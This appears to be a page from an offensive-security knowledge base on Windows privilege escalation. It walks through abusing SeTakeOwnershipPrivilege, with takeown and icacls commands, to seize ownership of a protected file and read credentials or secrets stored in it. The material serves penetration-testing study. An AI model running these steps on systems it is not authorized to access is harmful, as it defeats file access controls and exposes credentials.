Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeTakeOwnershipPrivilege

Protected File Access

Protected file access uses SeTakeOwnershipPrivilege to become the owner of a file, change the DACL, and then read or copy content that was previously blocked.

This is usually a credential access or sensitive data path. It becomes privilege escalation when the recovered file exposes credentials, service secrets, or configuration that leads to elevated execution.

When enumerating protected file access opportunities, try to identify:

  • SeTakeOwnershipPrivilege in the current token
  • Protected file with operational value
  • Current file owner and ACL
  • Minimal permission needed
  • Whether the original owner and ACL can be restored

Enumeration

Check the privilege:

whoami /priv

Record owner and ACL:

dir /q "C:\Path\To\File.txt"
icacls "C:\Path\To\File.txt"

Interesting findings include:

  • Access denied during normal read
  • File likely contains credentials or privileged configuration
  • Ownership can be taken
  • DACL can be modified after ownership changes

Once the owner is changed, grant only the access needed to read or copy the file.

Exploit

  1. Record current owner and ACL.
dir /q "C:\Path\To\File.txt"
icacls "C:\Path\To\File.txt"
  1. Take ownership.
takeown /f "C:\Path\To\File.txt"
  1. Grant the current user read access.
icacls "C:\Path\To\File.txt" /grant %USERNAME%:R
  1. Read or copy the file.
type "C:\Path\To\File.txt"